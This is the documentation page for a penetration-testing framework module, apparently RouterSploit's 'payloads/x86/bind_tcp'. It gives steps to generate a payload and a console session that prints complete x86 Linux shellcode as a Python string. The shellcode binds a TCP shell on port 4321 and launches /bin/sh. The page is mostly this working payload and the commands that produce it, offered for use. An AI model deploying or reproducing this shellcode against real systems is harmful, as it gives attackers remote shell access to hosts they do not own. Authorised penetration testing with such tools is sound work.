## Description Module generates payload that creates interactive tcp bind shell for X86 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x86/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates x86 bind shell tcp payload ## Scenarios ``` rsf > use payloads/x86/bind_tcp rsf (X86 Bind TCP) > set rport 4321 [+] rport => 4321 rsf (X86 Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x52\x68\x02\x00\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a" "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" "\x0b\xcd\x80" ) ```